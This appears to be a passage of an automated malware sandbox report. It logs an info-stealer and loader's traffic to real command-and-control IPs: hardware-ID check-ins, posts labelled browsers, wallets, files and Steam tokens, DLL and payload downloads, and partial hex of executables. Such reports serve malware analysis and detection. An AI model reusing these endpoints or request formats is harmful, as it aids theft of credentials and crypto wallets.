Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:56:09 GMTContent-Type: application/octet-streamContent-Length: 1887744Last-Modified: Sat, 26 Oct 2024 03:45:05 GMTConnection: keep-aliveETag: "671c65c1-1cce00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 b0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4a 00 00 04 00 00 86 06 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 93 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 92 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 
90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6a 74 61 79 69 72 62 00 c0 19 00 00 e0 30 00 00 b4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6d 6e 6f 77 62 6f 75 00 10 00 00 00 a0 4a 00 00 04 00 00 00 a8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 ac 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:56:12 GMTContent-Type: application/octet-streamContent-Length: 2831360Last-Modified: Sat, 26 Oct 2024 03:26:14 GMTConnection: keep-aliveETag: "671c6156-2b3400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2b 00 00 04 00 00 41 7d 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 72 6c 6b 6e 67 6d 71 6b 00 e0 2a 00 00 a0 00 00 00 d4 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 6a 6d 6e 62 74 70 6e 00 20 00 00 00 80 2b 00 00 04 00 00 00 0e 2b 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2b 00 00 22 00 00 00 12 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBGIDAEHCFIDGCBGIIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------FCFBGIDAEHCFIDGCBGIIContent-Disposition: form-data; name="hwid"AE8F08A16C9A291931458------FCFBGIDAEHCFIDGCBGIIContent-Disposition: form-data; name="build"puma------FCFBGIDAEHCFIDGCBGII--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFBHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="message"browsers------IEHIIIJDAAAAAAKECBFB--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBFCAEBFIJJKFHDAECHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------JJDBFCAEBFIJJKFHDAECContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------JJDBFCAEBFIJJKFHDAECContent-Disposition: form-data; name="message"plugins------JJDBFCAEBFIJJKFHDAEC--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEHHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="message"fplugins------DGDAEHCBGIIJJJJKKKEH--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJKHost: 185.215.113.206Content-Length: 8443Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDBFCBGDBKKECBFCGIEHost: 185.215.113.206Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAEGHIJEHJDHIDHIDAEHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJJJDAFBKEBGDGHCGDHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------BFHJJJDAFBKEBGDGHCGDContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------BFHJJJDAFBKEBGDGHCGDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFHJJJDAFBKEBGDGHCGDContent-Disposition: form-data; name="file"------BFHJJJDAFBKEBGDGHCGD--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIECFBAAAFHIIDGCGCBFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------FIECFBAAAFHIIDGCGCBFContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------FIECFBAAAFHIIDGCGCBFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FIECFBAAAFHIIDGCGCBFContent-Disposition: form-data; name="file"------FIECFBAAAFHIIDGCGCBF--
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 43 37 36 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42C76B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJEGDGIJECGCBGCGHDGHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKFIJDHJEGIDHJKKKJJHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="message"wallets------CAKFIJDHJEGIDHJKKKJJ--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECBAKFBGDGCBGDBAECHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 2d 2d 0d 0a Data Ascii: ------BKECBAKFBGDGCBGDBAECContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------BKECBAKFBGDGCBGDBAECContent-Disposition: form-data; name="message"files------BKECBAKFBGDGCBGDBAEC--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDHJKFIECAAKFIJJKJHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="file"------EHJDHJKFIECAAKFIJJKJ--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIEGHJEGHJKFIEBFHJKHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 2d 2d 0d 0a Data Ascii: ------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="message"ybncbhylepme------CGIEGHJEGHJKFIEBFHJK--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 36 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001605001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIDGDHCGCBAKFHIIIIIHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 2d 2d 0d 0a Data Ascii: ------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GHIDGDHCGCBAKFHIIIII--
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 36 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001606001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGHCAKKFBGDHJJJKECFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 48 43 41 4b 4b 46 42 47 44 48 4a 4a 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 38 46 30 38 41 31 36 43 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 48 43 41 4b 4b 46 42 47 44 48 4a 4a 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 48 43 41 4b 4b 46 42 47 44 48 4a 4a 4a 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------CBGHCAKKFBGDHJJJKECFContent-Disposition: form-data; name="hwid"AE8F08A16C9A291931458------CBGHCAKKFBGDHJJJKECFContent-Disposition: form-data; name="build"puma------CBGHCAKKFBGDHJJJKECF--
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 36 30 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001607001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 36 30 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001608001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFBFCBGHDGCFHJJECAFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 38 46 30 38 41 31 36 43 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 2d 2d 0d 0a Data Ascii: ------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="hwid"AE8F08A16C9A291931458------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="build"puma------BAFBFCBGHDGCFHJJECAF--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
